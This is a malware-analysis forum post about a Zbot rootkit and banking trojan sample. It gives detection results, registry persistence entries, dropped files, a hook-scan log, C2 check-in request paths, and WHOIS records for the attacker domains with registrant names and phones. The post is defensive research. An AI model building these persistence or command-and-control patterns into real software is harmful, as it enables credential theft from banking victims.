B.I.S.S. Forums > _tmp1147.exe (rootkit / banker)

Full Version: _tmp1147.exe (rootkit / banker)

B.I.S.S. Forums > Malware Research Forum > Malware Playground

Kimberly

Feb 24 2008, 12:21 PM

<h4>

File details

</h4>
Filename: _tmp1147.exe

Additional information
File size: 44032 bytes
MD5: 0834a772dea34a1175e4818f16a2ed9f
SHA1: 755e8cbe31e27dea14fa0f48948addb5b0a2c726
PEiD: -

QUOTE
File _tmp1147.exe received on 02.23.2008 19:45:24
AhnLab-V3 2008.2.22.0 2008.02.22 -
AntiVir 7.6.0.67 2008.02.22 -
Authentium 4.93.8 2008.02.23 -
Avast 4.7.1098.0 2008.02.22 -
AVG 7.5.0.516 2008.02.22 -
BitDefender 7.2 2008.02.23 -
CAT-QuickHeal 9.50 2008.02.22 (Suspicious) - DNAScan
ClamAV 0.92.1 2008.02.23 -
DrWeb 4.44.0.09170 2008.02.23 -
eSafe 7.0.15.0 2008.02.21 Suspicious File
eTrust-Vet 31.3.5557 2008.02.23 -
Ewido 4.0 2008.02.23 -
FileAdvisor 1 2008.02.23 -
Fortinet 3.14.0.0 2008.02.23 -
F-Prot 4.4.2.54 2008.02.22 -
F-Secure 6.70.13260.0 2008.02.22 Suspicious:W32/Malware!Gemini
Ikarus T3.1.1.20 2008.02.23 Trojan-Spy.Win32.Zbot.aft
Kaspersky 7.0.0.125 2008.02.23 -
McAfee 5236 2008.02.22 -
Microsoft 1.3204 2008.02.23 -
NOD32v2 2898 2008.02.23 -
Norman 5.80.02 2008.02.22 -
Panda 9.0.0.4 2008.02.23 Suspicious file
Prevx1 V2 2008.02.23 -
Rising 20.32.52.00 2008.02.23 -
Sophos 4.26.0 2008.02.23 -
Sunbelt 3.0.893.0 2008.02.23 -
Symantec 10 2008.02.23 -
TheHacker 6.2.9.228 2008.02.23 -
VBA32 3.12.6.1 2008.02.21 -
VirusBuster 4.3.26:9 2008.02.23 -
Webwasher-Gateway 6.6.2 2008.02.23 Win32.Malware.gen (suspicious)

<h4>

Visible signs

</h4>
Logfile of Trend Micro HijackThis v2.0.2
....
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\ntos.exe,
O4 - HKCU\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe
O4 - HKUS\S-1-5-18\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe (User 'Default user')

<h4>

Technical details

</h4>
Registry changes.

Adds different entries to ensure survival upon reboot.
QUOTE
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run "userinit"
Type: REG_SZ
Data: C:\WINDOWS\system32\ntos.exe
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run "userinit"
Type: REG_SZ
Data: C:\WINDOWS\system32\ntos.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Userinit"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\WINDOWS\system32\userinit.exe,
New data: C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\ntos.exe,
Creates an unique ID to identify the victim. This string is composed of the computername and some random numbers / letters and will be used when uploading information to the server.
QUOTE
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Network "UID"
Type: REG_SZ
Data: %computername%_00022A82
HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Network "UID"
Type: REG_SZ
Data: %computername%_000229C3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network "UID"
Type: REG_SZ
Data: %computername%_000227ED
Modifies the location of the following folders.
QUOTE
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cache"
Old data: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files
New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cookies"
Old data: C:\Documents and Settings\NetworkService\Cookies
New data: C:\WINDOWS\system32\config\systemprofile\Cookies
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "History"
Old data: C:\Documents and Settings\NetworkService\Local Settings\History
New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\History
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cache"
Old data: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files
New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cookies"
Old data: C:\Documents and Settings\NetworkService\Cookies
New data: C:\WINDOWS\system32\config\systemprofile\Cookies
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "History"
Old data: C:\Documents and Settings\NetworkService\Local Settings\History
New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\History
Misc. additions.
QUOTE
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer "{6780A29E-6A18-0C70-1DFF-1610DDE00108}"
Type: REG_BINARY
Data: ÷ ò
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer "{F710FA10-2031-3106-8872-93A2B5C5C620}"
Type: REG_BINARY
Data: ÷ ò

Folders added.

QUOTE
%System%\wsnpoem

Files added.

QUOTE
%System%\ntos.exe
Date: 8/4/2004 1:00 PM
Size: 128,512 bytes
%System%\wsnpoem\audio.dll
Date: 2/23/2008 8:44 PM
Size: 119 bytes
%System%\wsnpoem\video.dll
Date: 2/23/2008 8:44 PM
Size: 32,902 bytes

Note: %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

<h4>

Rootkit Scan

</h4>

QUOTE
GMER 1.0.14.13998 - http://www.gmer.net
Rootkit scan 2008-02-24 13:09:03
Windows 5.1.2600 Service Pack 2

---- User IAT/EAT - GMER 1.0.14 ----

IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 00AC4203
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 00AC41C5
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 00AC4192
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 00ACB490
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetMessageW] 00ACB777
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!PeekMessageW] 00ACB7D2
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!PeekMessageW] 00ACB7D2
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetMessageW] 00ACB777
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 00ACB490
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!GetMessageA] 00ACB74B
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!GetMessageW] 00ACB777
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!PeekMessageA] 00ACB7A3
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!PeekMessageW] 00ACB7D2
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 00B14203
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 00B141C5
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 00B14192
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\LSASRV.dll [ntdll.dll!LdrLoadDll] 00B14203
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SAMSRV.dll [ntdll.dll!LdrLoadDll] 00B14203
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SAMSRV.dll [ntdll.dll!LdrGetProcedureAddress] 00B141C5
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 00B1B490
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetMessageW] 00B1B777
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!PeekMessageW] 00B1B7D2
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!PeekMessageW] 00B1B7D2
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetMessageW] 00B1B777
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 00B1B490
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!GetMessageA] 00B1B74B
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!GetMessageW] 00B1B777
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!PeekMessageA] 00B1B7A3
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!PeekMessageW] 00B1B7D2
IAT C:\WINDOWS\system32\svchost.exe[720] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 00724192
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 00854203
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 008541C5
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 00854192
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 0085B490
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetMessageW] 0085B777
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!PeekMessageW] 0085B7D2
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!PeekMessageW] 0085B7D2
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetMessageW] 0085B777
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 0085B490
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!GetMessageA] 0085B74B
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!GetMessageW] 0085B777
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!PeekMessageA] 0085B7A3
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!PeekMessageW] 0085B7D2
...
etc
...

---- EOF - GMER 1.0.14 ----

Note: Due to the length of the scan, I left out a huge part of the log. The rootkit is hooked into each running process.

<h4>

Notes

</h4>
Trojan-Spy.Win32.Zbot.ajd is a rootkit / banking trojan that

may disable the firewall.
steals sensitive financial data (credit card numbers, online banking login details).
makes screen snapshots.
downloads additional components.
provides remote access to the compromised system.
previous versions were able to send out spam with their build-in SMTP engine.

The dropper starts by injecting code into winlogon.exe when executed.

If for any reason the dropper is unable to modify the process, it will cause a BSOD and you might find a copy of the dropper in the All Users\Start Menu\Programs\Startup folder so that the infection occurs on next reboot.

New memory pages are created in several exe files and the infection also creates 2 mutexes on the system to mark it's presence.

Next svchost.exe kills the smss.exe process.

Svchost.exe is also listening for inbound connections and will download 2 additional files from the server. They will be renamed as audio.dll and video.dll. The IP is hardcoded into the dropper.

The trojan will report back information to the server, using the unique identifier.

CODE
POST /templog/s.php?1=KLY-0FD93CFED46_00038E7&i=
POST /templog/s.php?2=KLY-0FD93CFED46_00038E7&n=1&v=16777739&i=&s=0&sp=0&lcp=0&pr=0

Note: The identifier seen here is different from the one in the registry changes due to a different session.
______________________________

For those interested, I made a video of it's behavior back in June 2007. You can view it by clicking on the camstasia logo below.

Note: Flash Player is needed.

______________________________

Additional references by Nicolas Brulez, 'senior virus researcher' at Websense:

<h4>

Offending IP

</h4>
topsthc.com - 124.217.252.193

QUOTE

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-02-10
Expires: 2009-02-10
Registrar Status: clientTransferProhibited
Name Server: NS1.PREMIUM-DNS.COM (has 304 domains)
Name Server: NS2.PREMIUM-DNS.COM
Whois Server: whois.estdomains.com
Server Type: Apache/1.3.39 (Unix) PHP/5.2.2 mod_ssl/2.8.30 OpenSSL/0.9.7a mod_perl/1.29 FrontPage/5.0.2.2510
IP Address: 124.217.252.193
IP Location - Malaysia - Piradius Net
Response Code: 403
Blacklist Status: Clear
Domain Status: Registered And Active Website
Registration Service Provided By: WEBST.RU
Contact: +7.9139079575
Website: http://webst.ru/

Domain Name: TOPSTHC.COM

Registrant:
Jooksed
Moriturus ()
Kyevskaya 15
Kyev
Kiev Oblast,03150
UA
Tel. +097.8754218

Creation Date: 10-Feb-2008
Expiration Date: 10-Feb-2009

Domain servers in listed order:
ns2.premium-dns.com
ns1.premium-dns.com

alljobwork.info - 209.51.154.100

QUOTE

Created: 2008-02-18
Expires: 2009-02-18
Whois Server: whois.afilias.info
IP Address: 209.51.154.100
IP Location - Georgia - Lilburn - Global Net Access Llc
Response Code: 200
Blacklist Status: Clear
Domain Status: Registered And Active Website
Domain ID:D23837576-LRMS
Domain Name:ALLJOBWORK.INFO
Created On:18-Feb-2008 07:19:54 UTC
Last Updated On:18-Feb-2008 07:21:08 UTC
Expiration Date:18-Feb-2009 07:19:54 UTC
Sponsoring Registrar:EstDomains, Inc. (R295-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:DI_7755132
Registrant Name:Shevchenko Ilya
Registrant Organization:N/A
Registrant Street1:ul. Svobodi d.16
Registrant Street2:
Registrant Street3:
Registrant City:SanktPiterburg
Registrant State/Province:Leningradskaya oblast
Registrant Postal Code:132631
Registrant Country:RU
Registrant Phone:+7.8122574598
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Name Server:NS1.THEJETHOST.ORG
Name Server:NS2.THEJETHOST.ORG

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.